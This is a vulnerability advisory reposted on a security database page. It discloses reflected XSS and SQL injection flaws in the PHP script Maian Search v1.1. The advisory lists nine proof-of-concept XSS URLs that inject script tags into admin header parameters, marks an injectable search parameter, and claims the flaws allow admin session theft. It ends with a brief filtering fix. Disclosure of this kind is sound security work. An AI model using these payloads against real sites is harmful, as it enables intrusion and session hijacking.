Lucene search
Basic search
Lucene search
Search by product
Subscribe
K
Start 30-day trial
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
SIGN IN
Securityvulns
SECURITYVULNS:DOC:19782
History
May 04, 2008 - 12:00 a.m.
Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
2008-05-04
00:00:00
vulners.com
20
JSON
Script : Maian Search v1.1
Type : Multiple Vulnerabilities (XSS/SQL INJECTION)
Discovered by : Khashayar Fereidani Or Dr.Crash
Our Team : IRCRASH
Our Site :
Http://IRCRASH.COM
IRCRASH Bugtraq :
Http://BUGTRAQ.IRCRASH.COM
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
Script Download :
http://www.maianscriptworld.co.uk/free-php-scripts.html
SQL INJECTION :
http://Example/search.php?cmd=search&keywords=
[SQL INJECTION]
XSS 1 :
http://Example/admin/inc/header.php?header=</title><script>alert('xss')</script>
;
XSS 2 :
http://Example/admin/inc/header.php?header2="<script>alert('xss')</script>
;
XSS 3 :
http://Example/admin/inc/header.php?header3="<script>alert('xss')</script>
;
XSS 4 :
http://Example/admin/inc/header.php?header4="<script>alert('xss')</script>
;
XSS 5 :
http://Example/admin/inc/header.php?header5="<script>alert('xss')</script>
;
XSS 6 :
http://Example/admin/inc/header.php?header6="<script>alert('xss')</script>
;
XSS 7 :
http://Example/admin/inc/header.php?header7="<script>alert('xss')</script>
;
XSS 8 :
http://Example/admin/inc/header.php?header8="<script>alert('xss')</script>
;
XSS 9 :
http://Example/admin/inc/header.php?header9="<script>alert('xss')</script>
;
You Can Get Admin Session With This Vuln …
Solution : Edit Source Code And Filter Variable With htmlspecialchar() function …
TNx : God…
Khashayar Fereidani Email : irancrash[at]gmail[dot]com
JSON